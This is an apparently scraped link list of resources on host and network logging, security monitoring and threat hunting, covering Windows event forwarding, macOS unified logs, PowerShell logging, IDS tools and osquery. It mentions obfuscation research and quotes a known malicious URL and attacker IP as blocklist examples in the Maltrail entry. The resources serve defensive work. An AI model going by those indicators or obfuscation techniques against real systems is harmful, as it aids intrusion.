Logging(Host/Network) / Security Monitoring / Threat Hunting
Table of Contents
- 101
- Logging
- Monitoring
- Detection Engineeing
- Threat Hunting
- [Data Storage & Analysis](#stacks )
101
Logging
-
101
- Articles/Writeups
- Talks/Presentations/Videos
-
General
- Articles/Writeups
-
Talks/Presentations/Videos
-
Logging ALL THE THINGS Without All The Cost With Open Source Big Data Tools - DEFCON22 - Zach Fasel
- Many struggle in their job with the decision of what events to log in battle against costly increases to their licensing of a commercial SIEM or other logging solution. Leveraging the open source solutions used for "big-data" that have been proven by many can help build a scalable, reliable, and hackable event logging and security intelligence system to address security and (cringe) compliance requirements. We’ll walk through the various components and simple steps to building your own logging environment that can extensively grow (or keep sized just right) with just additional hardware cost and show numerous examples you can implement as soon as you get back to work (or home).
-
Logging ALL THE THINGS Without All The Cost With Open Source Big Data Tools - DEFCON22 - Zach Fasel
-
Non-OS
-
Bandwidth
-
bmon - bandwidth monitor and rate estimator
- bmon is a monitoring and debugging tool to capture networking related statistics and prepare them visually in a human friendly way. It features various output methods including an interactive curses user interface and a programmable text output for scripting.
-
bmon - bandwidth monitor and rate estimator
-
ESXi
- Articles/Writeups
-
Tools
-
sexilog
- SexiLog is a specific ELK virtual appliance designed for vSphere environment
-
sexilog
-
Slack
-
Slack API Auditor
- Provides a quick method of collecting Slack access logs and integration logs, then forwards them via Logstash.
-
Slack API Auditor
-
Bandwidth
-
Linux
- 101
- Articles/Writeups
- Understanding
-
Tools
-
Syslong-ng
- syslog-ng is an enhanced log daemon, supporting a wide range of input and output methods: syslog, unstructured text, message queues, databases (SQL and NoSQL alike) and more.
-
Syslong-ng
-
macOS/OS X
-
101
-
How long does your Mac keep its log for? - hoakley(2020)
- "macOS keeps around 52 tracev3 log files in /var/db/diagnostics/Persist, so the active log extends back as long as it has taken to write those"
- Capturing the moment in your log: how to identify a problem - hoakley(2019)
- Making your own logarchive from a backup - hoakley
-
How long does your Mac keep its log for? - hoakley(2020)
-
Tools
- T2M2, Ulbow, Consolation and log utilities - hoakley
-
UnifiedLogReader
- A parser for Unified logging tracev3 files
-
OSXMon
- Small project demonstrating log collection using SUpraudit + splunk
-
SUpraudit
- RE'd praudit rewrite by Jonathan Levin
-
Understanding
-
Articles/Blogposts/Writeups
- Starting up in Catalina: sequence and waypoints in the log - hoakley(2019)
- When did my Mac last start up, and why? An exploration with Ulbow - hoakley(2020)
- Mac shutdown and sleep cause codes - hoakley
- RunningBoard: a new subsystem in Catalina to detect errors - hoakley(2019)
- How RunningBoard tracks every app, and manages some - hoakley(2019)
-
Introducing 'Analysis of Apple Unified Logs: Quarantine Edition' [Entry 0] - Sarah Edwards
- Check out the whole series.
-
Articles/Blogposts/Writeups
-
Unified Log
- 101
-
Articles/Blogposts/Writeups
- macOS Unified log: 1 why, what and how - hoakley(2018)
- macOS Unified log: 2 content and extraction - hoakley
- macOS Unified log: 3 finding your way - hoakley
- Inside Catalina’s unified log: how has it changed? - hoakley(2019)
- How to use the unified log to see what’s going wrong - hoakley(2018)
- Logs Unite! Forensic Analysis Of Apple Unified Logs - Sarah Edwards(2017)
-
Talks/Presentations/Videos
-
Unified Logging and Activity Tracing - AppleWWDC2018
- The new Unified Logging and Tracing System for iOS and macOS uses Activity Tracing for performance, consolidates kernel and user-space logging, and has many other improvements. Learn how Logging and Tracing can help you debug and troubleshoot issues with your apps.
-
Unified Logging and Activity Tracing - AppleWWDC2018
-
Endpoint Security Framework
- Articles/Blogposts/Writeups
-
OpenBSM
- Articles/Blogposts/Writeups
-
Talks/Videos/Presentations
- Getting Cozy With OpenBSM Auditing On MacOS - Patrick Wardle(Shmoocon2018)
-
Getting Cozy With OpenBSM Auditing On MacOS - Patrick Wardle
- With the demise of dtrace on macOS, and Apple’s push to rid the kernel of 3rd-party kexts, another option is needed to perform effective auditing on macOS. Lucky for us, OpenBSM fits the bill. Though quite powerful, this auditing mechanism is rather poorly documented and suffered from a variety of kernel vulnerabilities. In this talk, we’ll begin with an introductory overview of OpenBSM’s goals, capabilities, and components before going ‘behind-the-scenes’ to take a closer look at it’s kernel-mode implementation. Armed with this understanding, we’ll then detail exactly how to build powerful user-mode macOS monitoring utilities such as file, process, and networking monitors based on the OpenBSM framework and APIs. Next we’ll don our hacker hats and discuss a handful of kernel bugs discovered during a previous audit of the audit subsystem (yes, quite meta): a subtle off-by-one read error, a blotched patch that turned the off-by-one into a kernel info leak, and finally an exploitable heap overflow. Though now patched, the discussion of these bugs provides an interesting ‘case-study’ of finding and exploiting several types of bugs that lurked within the macOS kernel for many years
- Process Creation
-
101
-
Windows
- 101
- General Articles/Overview aka How to use Event Viewer
-
Auditing/Audit Events
-
Windows 10 and Windows Server 2016 security auditing and monitoring reference - microsoft.com
- This reference details most advanced security audit events for Windows 10 and Windows Server 2016.
-
Windows security audit events - ms.com
- This spreadsheet details the security audit events for Windows.
-
Windows 10 and Windows Server 2016 security auditing and monitoring reference - microsoft.com
- Cheat Sheets
-
Command Line Auditing
- Command line process auditing - docs.ms(2017)
- Microsoft security advisory: Update to improve Windows command-line auditing: February 10, 2015
- [Audit Process Creation - docs.ms](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn319093(v=ws.11))
- Prior to Win10
-
Command line process auditing - docs.ms(2017)
- 'Applies To: Windows Server 2016, Windows Server 2012 R2'
-
Invoke-DOSfuscation: Techniques FOR %F IN (-style) DO (S-level CMD Obfuscation) - Daniel Bohannon(BHAsia2018)
- "In this presentation, I will dive deep into cmd[.]exe's multi-faceted obfuscation opportunities beginning with carets, quotes and stdin argument hiding. Next I will extrapolate more complex techniques including FIN7's string removal/replacement concept and two never-before-seen obfuscation and full encoding techniques – all performed entirely in memory by cmd[.]exe. Finally, I will outline three approaches for obfuscating binary names from static and dynamic analysis while highlighting lesser-known cmd[.]exe replacement binaries."
- Event Collector
-
Event Forwarding
-
101
- Introduction to Windows Event Forwarding
- Windows Event Collector - docs.ms
-
Using Windows Event Collector - docs.ms
- This section lists the topics that explain the tasks that can be accomplished using the Windows Event Collector SDK.
- Windows Event Forwarding - Centralized logging for everyone! (Even if you already have centralized logging!) - Jessica Payne(2015)
-
Use Windows Event Forwarding to help with intrusion detection - docs.ms(2019)
- Learn about an approach to collect events from devices in your organization. This article talks about events in both normal operations and when an intrusion is suspected.
- Creating Custom Windows Event Forwarding Logs - docs.ms
- Use Windows Event Forwarding to help with intrusion detection
- Monitoring what matters – Windows Event Forwarding for everyone (even if you already have a SIEM.) - docs.ms(2015)
-
Articles/Writeups
-
Windows Event Logging and Forwarding - Australian Cybersecurity Center
- This document has been developed as a guide to the setup and configuration of Windows event logging and forwarding. This advice has been developed to support both the detection and investigation of malicious activity by providing an ideal balance between the collection of important events and management of data volumes. This advice is also designed to complement existing host-based intrusion detection and prevention systems. This document is intended for information technology and information security professionals. It covers the types of events which can be generated and an assessment of their relative value, centralised collection of event logs, the retention of event logs, and recommended Group Policy settings along with implementation notes.
- Paper - 2019
- Australian Cyber Security Center's Windows Event Logging repository
-
Windows Event Forwarding Guidance - Palantir
- Over the past few years, Palantir has a maintained an internal Windows Event Forwarding (WEF) pipeline for generating and centrally collecting logs of forensic and security value from Microsoft Windows hosts. Once these events are collected and indexed, alerting and detection strategies (ADS) can be constructed not only on high-fidelity security events (e.g. log deletion), but also for deviations from normalcy, such as unusual service account access, access to sensitive filesystem or registry locations, or installation of malware persistence. The goal of this project is to provide the necessary building blocks for organizations to rapidly evaluate and deploy WEF to a production environment, and centralize public efforts to improve WEF subscriptions and encourage adoption. While WEF has become more popular in recent years, it is still dramatically underrepresented in the community, and it is our hope that this project may encourage others to adopt it for incident detection and response purposes. We acknowledge the efforts that Microsoft, IAD, and other contributors have made to this space and wish to thank them for providing many of the subscriptions, ideas, and techniques that will be covered in this post.
-
Event-Forwarding-Guidance - NSA
- Configuration guidance for implementing collection of security relevant Windows Event Log events by using Windows Event Forwarding.
- Windows Event Forwarding for Network Defense - Palantir
- End-Point Log Consolidation with Windows Event Forwarder - Derek Banks(2017)
- The Windows Event Forwarding Survival Guide - Chris Long(2017)
- Setting up Windows Event Forwarder Server (WEF) (Domain) Part 1/3 - Pablo Delgado(2017)
-
Windows Event Logging and Forwarding - Australian Cybersecurity Center
- Custom Logs
- Filtering/XPath
- Tools
-
101
-
Event Log
- 101
-
Reference for Logs
-
My Event Log
- Searchable database of Windows Event log entries.
- Windows Event Log Encyclopedia - ultimatewindowsecurity.com
-
My Event Log
-
Articles/Writeups
- Get-EventLog shows wrong maximum size of event logs - Przemyslaw Klys(2018)
- Use Windows Event Forwarding to help with intrusion detection - docs.ms
- Windows Event Log Zero 2 Hero Slides
- Advanced Audit Policy – which GPO corresponds with which Event ID - girl-germs.com
- Windows Event Logging for Insider Threat Detection - Derrick Spooner(2019)
-
JPCert Tool Analysis Result Sheet
- This site summarizes the results of examining logs recorded in Windows upon execution of the 49 tools which are likely to be used by the attacker that has infiltrated a network. The following logs were examined. Note that it was confirmed that traces of tool execution is most likely to be left in event logs. Accordingly, examination of event logs is the main focus here.
-
Understanding
-
EVTX and Windows Event Logging - Brandon Charter(2008)
- This paper will explore Microsoft’s EVTX log format and Windows Event Logging framework.
- Event Log File Format - docs.ms
- [MS-EVEN6]: EventLog Remoting Protocol Version 6.0 - docs.ms
-
EVTX and Windows Event Logging - Brandon Charter(2008)
- Talks/Presentations/Videos
-
Tools
-
EventLogParser
- Parse PowerShell and Security event logs for sensitive information.
-
libevtx
- Library and tools to access the Windows XML Event Log (EVTX) format
-
python-evtx
- python-evtx is a pure Python parser for recent Windows Event Log files (those with the file extension ".evtx"). The module provides programmatic access to the File and Chunk headers, record templates, and event entries.
-
EventLogParser
-
Event Tracing for Windows
- 101
-
Articles/Blogposts/Writeups
- ETW Event Tracing for Windows and ETL Files - Nicole Ibrahim
- SilkETW: Because Free Telemetry is … Free! - Ruben Boonnen
- Tampering with Windows Event Tracing: Background, Offense, and Defense - Palantir
- Getting started with Event Tracing for Windows in C# - Alex Khanin
-
Event Tracing for Windows and Network Monitor
- "Event Tracing for Windows, (ETW), has been around for quite a while now as it was introduced in Windows 2000. It's basically instrumented logging that describes what a component is doing. Conceptually, it-s something like the proverbial printf("here1") concept used by programmers, but it is present in retail builds. When you enable logging in a component the result is an ETL (Event Trace Log) file. What-s new is that that Network Monitor can read any ETL file. And with the supplied parsers many network oriented ETW providers can be decoded."
-
Talks/Videos
- Production tracing with Event Tracing for Windows (ETW) - Doug Cook
-
ETW - Monitor Anything, Anytime, Anywhere - Dina Goldshtein(NDC Oslo 2017)
- You’ll learn how to diagnose incredibly complex issues in production systems such as excessive garbage collection pauses, slow startup due to JIT and disk accesses, and even sluggishness during the Windows boot process. We will also explore some ways to automate ETW collection and analysis to build self-diagnosing applications that identify high CPU issues, resource leaks, and concurrency problems and produce alerts and reports. In the course of the talk we will use innovative performance tools that haven’t been applied to ETW before — flame graphs for visualising call stacks and a command-line interface for dynamic, scriptable ETW tracing. ETW is truly a window into everything happening on your system, and it doesn’t require expensive licenses, invasive tools, or modifying your code in any way. It is a critical, first-stop skill on your way to mastering application performance and diagnostics.
-
Windows Forensics: Event Trace Logs - Nicole Ibrahim(SANS DFIR Summit 2018)
- This talk will cover what ETL files are and where you can expect to find them, how to decode ETL files, caveats associated with those files, and some interesting and forensically relevant data that ETL files can provide.
-
Tools
-
SilkETW & SilkService
- SilkETW & SilkService are flexible C# wrappers for ETW, they are meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection. While both projects have obvious defensive (and offensive) applications they should primarily be considered as research tools. For easy consumption, output data is serialized to JSON. The JSON data can either be written to file and analyzed locally using PowerShell, stored in the Windows eventlog or shipped off to 3rd party infrastructure such as Elasticsearch.
-
SilkETW & SilkService
- Logon Events
- Parsing
-
PowerShell
-
101
- PowerShell ♥ the Blue Team - PowerShell Team(2015)
-
About Group Policy Settings - docs.ms
- Describes the Group Policy settings for Windows PowerShell
- Windows PowerShell Logging CheatSheet - Malware Archaeology
- Articles/Blogposts/Writeups
-
Event Log
-
About Eventlogs - docs.ms
- Windows PowerShell creates a Windows event log that is named "Windows PowerShell" to record Windows PowerShell events. You can view this log in Event Viewer or by using cmdlets that get events, such as the Get-EventLog cmdlet. By default, Windows PowerShell engine and provider events are recorded in the event log, but you can use the event log preference variables to customize the event log. For example, you can add events about Windows PowerShell commands.
- PowerShell – Everything you wanted to know about Event Logs and then some - Przemyslaw Klys(2019)
-
About Eventlogs - docs.ms
- Script Block Logging
- Transcript Logging
-
Talks/Presentations/Videos
-
When Logging Everything Becomes an Issue - Edward Ruprecht(WWHF19)
- Slides
- Discussing potential issues with logging Sysmon and PowerShell logs. Potential sensitive data leakage, best practices, and scalability issues.
-
Invoke-Obfuscation: PowerShell obFUsk8tion - Daniel Bohannon(Hactivity2016)
- "Today’s detection techniques monitor for certain strings in powershell.exe’s command-line arguments. While this provides tremendous value for most of today’s PowerShell attacks, I will introduce over a dozen obfuscation techniques that render today’s detection techniques grossly ineffective. These techniques will enable the innovative Red Team to continue using PowerShell undetected while challenging the Blue Team to identify these attacks more effectively. Finally, I will unveil Invoke-Obfuscation.ps1 which will enable both Red and Blue Teams to effortlessly create highly obfuscated PowerShell commands so organizations can test their detection capabilities against these obfuscation techniques."
-
Revoke-Obfuscation: PowerShell Obfuscation Detection (And Evasion) Using Science - Daniel Bohannon(BHUSA2017)
- Attackers, administrators and many legitimate products rely on PowerShell for their core functionality. However, being a Windows-signed binary native on Windows 7 and later that enables reflective injection of binaries and DLLs and memory-resident execution of remotely hosted scripts, has made it increasingly attractive for attackers and commodity malware authors alike. In environments where PowerShell is heavily used, filtering out legitimate activity to detect malicious PowerShell usage is not trivial.
-
Malicious payloads vs. deep visibility: a PowerShell story - Daniel Bohannon(PSConEU2019)
- "This talk draws from over four years of Incident Response experience to lay out a technical buffet of in-the-wild malicious PowerShell payloads and techniques. In addition to diving deep into the mechanics of each malicious example, this presentation will highlight forensic artifacts, detection approaches and the deep visibility that the latest versions of PowerShell provides security practitioners to defend their organizations against the latest attacks that utilize PowerShell. So if you are new to security or just want to learn about how attackers have used PowerShell in their attacks, then this talk is for you. If you want to see what obfuscated and multi-stage, evasive PowerShell-based attacks look like under the microscope of PowerShell deep inspection capabilities, this talk is for you. And if you want to see why these security advancements to PowerShell are causing many attackers to shift their tradecraft development away from PowerShell, this talk is for you."
-
When Logging Everything Becomes an Issue - Edward Ruprecht(WWHF19)
-
Tools
-
check_ioc
- Check_ioc is a script to check for various, selectable indicators of compromise on Windows systems via PowerShell and Event Logs. It was primarily written to be run on a schedule from a monitoring engine such as Nagios, however, it may also be run from a command-line (for incident response).
-
Get-InjectedThread.ps1
- Looks for threads that were created as a result of code injection.
- PowerShellMethodAuditor
-
Revoke-Obfuscation - Github
- Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework.
-
GetInjectedThreads.ps1
- Looks for threads that were created as a result of code injection.
-
block-parser
- Parser for Windows PowerShell script block logs
-
EventList
- EventList is a tool to help improving your Audit capabilities and to help to build your Security Operation Center. It helps you combining Microsoft Security Baselines with MITRE ATT&CK and generating hunting queries for your SIEM system - regardless of the product used.
-
GENE: Go Evtx sigNature Engine
- The idea behind this project is to provide an efficient and standard way to look into Windows Event Logs (a.k.a EVTX files). For those who are familiar with Yara, it can be seen as a Yara engine but to look for information into Windows Events.
-
check_ioc
-
101
-
WMI
-
WMI-IDS
- WMI-IDS is a proof-of-concept agent-less host intrusion detection system designed to showcase the unique ability of WMI to respond to and react to operating system events in real-time.
-
WMI-IDS
Monitoring
-
101
-
Articles/Blogposts/Writeups
- Crown Jewels: Monitoring vs Mitigating - Pen Consultants
-
Introducing the Funnel of Fidelity - Jared Atkinson(2019)
- [...]As a result, I created a model to describe the conceptual process that organizations follow to quantify the high level roles and responsibilities of a detection and response program. As events pass through the model the depth of event analysis and fidelity is increased. For this reason I call the model the Funnel of Fidelity (following the naming convention of David Bianco’s Pyramid of Pain).
- Talks/Presentations/Videos
-
Articles/Blogposts/Writeups
-
Breach Detection/Response
- Articles/Blogposts/Presentations/Talks/Writeups
-
Tools
-
Infection Monkey
- The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Command and Control(C&C) server.
-
411
- Configure Searches to periodically run against a variety of data sources. You can define a custom pipeline of Filters to manipulate any generated Alerts and forward them to multiple Targets.
-
Pattern
- Pattern is a web mining module for Python. It has tools for: Data Mining: web services (Google,; Twitter, Wikipedia), web crawler, HTML DOM parser; Natural Language Processing: part-of-speech taggers, n-gram search, sentiment analysis, WordNet; Machine Learning: vector space model, clustering, classification (KNN, SVM, Perceptron); Network Analysis: graph centrality and visualization.
-
Infection Monkey
-
File Analysis
-
BinaryAlert
- BinaryAlert is an open-source serverless AWS pipeline where any file uploaded to an S3 bucket is immediately scanned with a configurable set of YARA rules. An alert will fire as soon as any match is found, giving an incident response team the ability to quickly contain the threat before it spreads.
-
BinaryAlert
-
Infrastructure Monitoring
-
Ninja Level Infrastructure Monitoring Workshop - Defcon24
- This repository contains all the presentation, documentation and the configuration, sample logs, ansible playbook, customized dashboards and more.
-
Ninja Level Infrastructure Monitoring Workshop - Defcon24
-
Network-based
- 101
- Articles/Writeups
-
Talks/Presentations
-
Passive IPS Reconnaissance and Enumeration - false positive (ab)use - Arron Finnon
- Network Intrusion Prevention Systems or NIPS have been plagued by "False Positive" issues almost since their first deployment. A "False Positive" could simply be described as incorrectly or mistakenly detecting a threat that is not real. A large amount of research has gone into using "False Positive" as an attack vector either to attack the very validity of an IPS system or to conduct forms of Denial of Service attacks. However the very reaction to a "False Positive" in the first place may very well reveal more detailed information about defences than you might well think.
- You Pass Butter: Next Level Security Monitoring Through Proactivity
-
Passive IPS Reconnaissance and Enumeration - false positive (ab)use - Arron Finnon
- Understanding
-
Sigma
-
Sigma
- Sigma is a generic and open signature format that allows you to describe relevant log events in a straight forward manner. The rule format is very flexible, easy to write and applicable to any type of log file. The main purpose of this project is to provide a structured form in which researchers or analysts can describe their once developed detection methods and make them shareable with others. Sigma is for log files what Snort is for network traffic and YARA is for files.
- Sigma Specification
- How to Write Sigma Rules - Florian Roth
-
Sigma - Generic Signatures for Log Events - Thomas Patzke(Hack.lu2017)
- Log files are a great resource for hunting threats and analysis of incidents. Unfortunately, there is no standardized signature format like YARA for files or Snort signatures for network traffic. This makes sharing of log signatures by security researchers and software developers problematic. Further, most SIEM systems have their own query language, which makes signature distribution in large heterogeneous environments inefficient and increases costs for replacement of SIEM solutions.Sigma tries to fill these gaps by providing a YAML-based format for log signatures, an open repository of signatures and an extensible tool that converts Sigma signatures into different query languages. Rules and tools were released as open source and are actively developed. This presentation gives an overview about use cases, Sigma rules and the conversion tool, the development community and future plans of the project.
-
MITRE ATT&CK and Sigma Alerting - Justin Henderson, John Hubbard(2019)
- This webcast will introduce the Sigma Alert project and show examples of creating alert rules against MITRE ATT&CK framework items to discover attacks in a way that works for multiple products. Sigma allows for writing rules in a neutral rule format that supports converting the rule to support your product of choice.
-
Sigma
-
IDS/IPS Tools
-
Snort
-
Snort
- A free lightweight network intrusion detection system for UNIX and Windows.
- Snort FAQ
- Snort User Manual
- Snort Documentation
-
Snort
-
Bro/Zeek
-
101
-
Zeek
- Zeek is an open source software platform that provides compact, high-fidelity transaction logs, file content, and fully customized output to analysts, from the smallest home office to the largest, fastest research and commercial networks.
- Zeek Quick Start Guide
- Zeek Documentation
- Try Zeek in your browser!
- Writing Zeek Scripts
-
Zeek
- Articles/Blogposts
-
Tools
-
bro-intel-generator
- Script for generating Bro intel files from pdf or html reports
-
bro-domain-generation
- Detect domain generation algorithms (DGA) with Bro. The module will regularly generate domains by any implemented algorithms and watch for those domains in DNS queries. This script only works with Bro 2.1+.
-
Exfil Framework
- The Exfil Framework is a suite of Bro scripts that detect file uploads in TCP connections. The Exfil Framework can detect file uploads in most TCP sessions including sessions that have encrypted payloads (SCP,SFTP,HTTPS).
-
brim
- Desktop application to efficiently search large packet captures and Zeek logs.
-
bro-intel-generator
-
101
-
Suricata
-
Suricata
- Suricata is a high performance Network IDS, IPS and Network Security Monitoring engine. Open Source and owned by a community run non-profit foundation, the Open Information Security Foundation (OISF).
- Suricata Documentation
-
Suricata
- Snort
-
Argus
-
Argus
- Argus is an open source layer 2+ auditing tool (including IP audit) written by Carter Bullard which has been under development for over 10 years.
- Argus on NSM Wiki
- Argus FAQ
- Argus How-To
- Argus Manual
-
Argus
-
Other
-
Maltrail
- Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name (e.g. zvpprsensinaix.com for Banjori malware), URL (e.g.
http://109.162.38.120/harsh02.exe
for known malicious executable), IP address (e.g. 185.130.5.231 for known attacker) or HTTP User-Agent header value (e.g. sqlmap for automatic SQL injection and database takeover tool). Also, it uses (optional) advanced heuristic mechanisms that can help in discovery of unknown threats (e.g. new malware).
- Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name (e.g. zvpprsensinaix.com for Banjori malware), URL (e.g.
-
Maltrail
-
Snort
-
IDS/IPS Monitoring Tools
- Snorby
-
Snorby - Github
- Snorby is a ruby on rails web application for network security monitoring that interfaces with current popular intrusion detection systems (Snort, Suricata and Sagan). The basic fundamental concepts behind Snorby are simplicity, organization and power. The project goal is to create a free, open source and highly competitive application for network monitoring for both private and enterprise use.
-
Squil
- Sguil (pronounced sgweel) is built by network security analysts for network security analysts. Sguil's main component is an intuitive GUI that provides access to realtime events, session data, and raw packet captures. Sguil facilitates the practice of Network Security Monitoring and event driven analysis. The Sguil client is written in tcl/tk and can be run on any operating system that supports tcl/tk (including Linux, * BSD, Solaris, MacOS, and Win32).
- Squil FAQ
-
Squert
- Squert is a web application that is used to query and view event data stored in a Sguil database (typically IDS alert data). Squert is a visual tool that attempts to provide additional context to events through the use of metadata, time series representations and weighted and logically grouped result sets. The hope is that these views will prompt questions that otherwise may not have been asked.
- Slide Deck on Squert
- Install/setup/etc - Github
-
General Tools
-
General
-
Security Onion
- Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It's based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, Snorby, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!
-
Security Onion
-
Data Tranformation
-
Pip3line, the Swiss army knife of byte manipulation
- Pip3line is a raw bytes manipulation utility, able to apply well known and less well known transformations from anywhere to anywhere (almost).
-
dnstwist
- Domain name permutation engine for detecting typo squatting, phishing and corporate espionage
-
Pip3line, the Swiss army knife of byte manipulation
-
DNS
-
DNSChef
- DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka "Fake DNS") is a tool used for application network traffic analysis among other uses. For example, a DNS proxy can be used to fake requests for "badguy.com" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.
-
Passive DNS
- A tool to collect DNS records passively to aid Incident handling, Network Security Monitoring (NSM) and general digital forensics. * PassiveDNS sniffs traffic from an interface or reads a pcap-file and outputs the DNS-server answers to a log file. PassiveDNS can cache/aggregate duplicate DNS answers in-memory, limiting the amount of data in the logfile without losing the essense in the DNS answer.
-
DNSChef
-
HTTP Traffic
-
Captipper
- CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic. CapTipper sets up a web server that acts exactly as the server in the PCAP file, and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found.
-
Captipper
-
PCAPs/Packet Capture
-
CapLoader
- CapLoader is a Windows tool designed to handle large amounts of captured network traffic. CapLoader performs indexing of PCAP/PcapNG files and visualizes their contents as a list of TCP and UDP flows. Users can select the flows of interest and quickly filter out those packets from the loaded PCAP files. Sending the selected flows/packets to a packet analyzer tool like Wireshark or NetworkMiner is then just a mouse click away.
-
Netdude
- The Network Dump data Displayer and Editor is a framework for inspection, analysis and manipulation of tcpdump trace files. It addresses the need for a toolset that allows easy inspection, modification, and creation of pcap/tcpdump trace files. Netdude builds on any popular UNIX-like OS, such as Linux, the BSDs, or OSX.
-
Stenographer
- Stenographer is a full-packet-capture utility for buffering packets to disk for intrusion detection and incident response purposes. It provides a high-performance implementation of NIC-to-disk packet writing, handles deleting those files as disk fills up, and provides methods for reading back specific sets of packets quickly and easily.
-
PCAPDB
- PcapDB is a distributed, search-optimized open source packet capture system. It was designed to replace expensive, commercial appliances with off-the-shelf hardware and a free, easy to manage software system. Captured packets are reorganized during capture by flow (an indefinite length sequence of packets with the same src/dst ips/ports and transport proto), indexed by flow, and searched (again) by flow. The indexes for the captured packets are relatively tiny (typically less than 1% the size of the captured data).
-
Network Miner
- NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files.
-
SilLK
-
Silk
- The SiLK analysis suite is a collection of command-line tools for processing SiLK Flow records created by the SiLK packing system. These tools read binary files containing SiLK Flow records and partition, sort, and count these records. The most important analysis tool is rwfilter, an application for querying the central data repository for SiLK Flow records that satisfy a set of filtering options. The tools are intended to be combined in various ways to perform an analysis task. A typical analysis uses UNIX pipes and intermediate data files to share data between invocations of the tools.
- Administering/Installing SiLK
- SiLK Tool Tips
- SiLK Reference Guide
- SiLK Toolsuite Quick Reference Guide
-
flowbat
- Awesome flow tool, SiLK backend
-
Silk
-
CapLoader
-
ShellCode Analysis
-
Shellcode Analysis Pipeline
- I recently required an automated way of analyzing shellcode and verifying if it is detected by Libemu, Snort, Suricata, Bro, etc. Shellcode had to come from public sources like Shell-Storm, Exploit-DB and Metasploit. I needed an automated way of sourcing shellcode from these projects and pass it on to the analysis engines in a pipeline-like mechanism. This posts documents the method I used to complete this task and the overall progress of the project.
-
Shellcode Analysis Pipeline
-
General
-
OSQuery
-
101
-
osquery
- osquery is a SQL powered operating system instrumentation, monitoring, and analytics framework. Available for Linux, macOS, Windows, and FreeBSD.
- Table Schema v4.3
- Getting Started Documentation
- Optimizing Queries in OSQuery - Dennis Griffin(2018)
-
osquery
-
Articles/Blogposts/Writeups
- osquery Across the Enterprise - Chris L(Palantir 2017)
- Palantir osquery Configuration The goal of this project is to provide a baseline template for any organization considering a deployment of osquery in a production environment.
- Blue Team Diary, Entry #1: Leveraging Osquery For Enhanced Incident Response & Threat Hunting - Dimitrios Bougioukas(2019)
-
Talks/Presentations/Videos
-
Leveraging Osquery For Enhanced Incident Response & Threat Hunting - Dimitrios Bougioukas(2019)
- This video accompanies eLearnSecurity's Blue Team Diary, Entry #1: Leveraging Osquery For Enhanced Incident Response & Threat Hunting post on medium.
-
Osquery across compliance, monitoring, risk and threat hunting - Hugh Neale(QueryCon2019)
- Stories, use cases and lessons learnt from the front line: Hugh will demonstrate how powerful osquery is across compliance, monitoring, risk IAM and threat hunting. The goal is to help build a complete picture of your IT estate and security posture. This talk is aimed at IT and Security operations. Zercurity has been using osquery in production workloads from startups to listed companies. They use osquery for inventory management, monitoring, compliance, risk, vulnerability management and IAM to name a few. Hugh will share some of their takeaways over the last few years and tell you about some of the things you can build atop osquery.
- Slides
-
Monitoring Ephemeral Infrastructure with osquery - Matt Jane(Querycon219)
- Modern infrastructure and deployment methods, as well as web-scale infrastructure have brought about a new paradigm in infrastructure management. Short lived and ephemeral resources allow applications to scale up and down on demand. Unfortunately this means that one of the primary information gather methods of osquery, scheduled queries, becomes far less useful if queries are scheduled for a longer interval than the infrastructure will exist. This doesn’t mean osquery and scheduled queries are no longer useful, far from it. It simply means that we need to adjust our way of thinking a bit and adapt our methods of information gathering to overcome these new issues.
- Slides
-
Linux security event monitoring with osquery - Alessandro Gario(Querycon2019)
- This talk introduces security event monitoring on Linux, and our lessons learned from attempts to implement it within osquery. Our first experience with osquery event monitoring was rewriting its use of Auditd. In order to capture events within containers, we next implemented an event publisher based on eBPF. We discovered what works, what doesn’t, and some paths forward.
-
How osquery uses sqlite3 and rocksdb - Alex Malone(Querycon2019)
- We will walk through a query from SQL to the logged JSON results, noting the important interactions with sqlite3 and rocksdb. For example, the processes table specifies an INDEX on pid. What does that entail, and how does it impact how the table generate() function is called? In this talk, listeners will gain insight into the sqlite3 virtual table API.
-
Leveraging Osquery For Enhanced Incident Response & Threat Hunting - Dimitrios Bougioukas(2019)
-
Tooling
- Fleet Managers
-
Fleet
- Fleet is the most widely used open-source osquery Fleet manager. Deploying osquery with Fleet enables live queries, and effective management of osquery infrastructure.
-
Doorman
- Doorman is an osquery fleet manager that allows administrators to remotely manage the osquery configurations retrieved by nodes. Administrators can dynamically configure the set of packs, queries, and/or file integrity monitoring target paths using tags. Doorman takes advantage of osquery's TLS configuration, logger, and distributed read/write endpoints, to give administrators visibility across a fleet of devices with minimal overhead and intrusiveness.
-
Fleet
- Plugins/Extensions
-
osquery-go
- This project contains Go bindings for creating osquery extensions in Go.
-
osquery-python
- This project contains the official Python bindings for creating osquery extensions in Python.
-
brosquery
- This project builds an OSQuery module libbro.so for loading bro logs as tables in osquery.
-
osquery extensions by Trail of Bits
- This repository includes osquery extensions developed and maintained by Trail of Bits.
-
osquery-go
- Fleet Managers
-
101
-
Linux
- 101
- Articles/Writeups
- Understanding
- Tools
-
macOS/OS X
- 101
- Articles/Writeups
- Understanding
-
Tools
-
Crescendo
- Crescendo is a swift based, real time event viewer for macOS. It utilizes Apple's Endpoint Security Framework.
- Blogpost
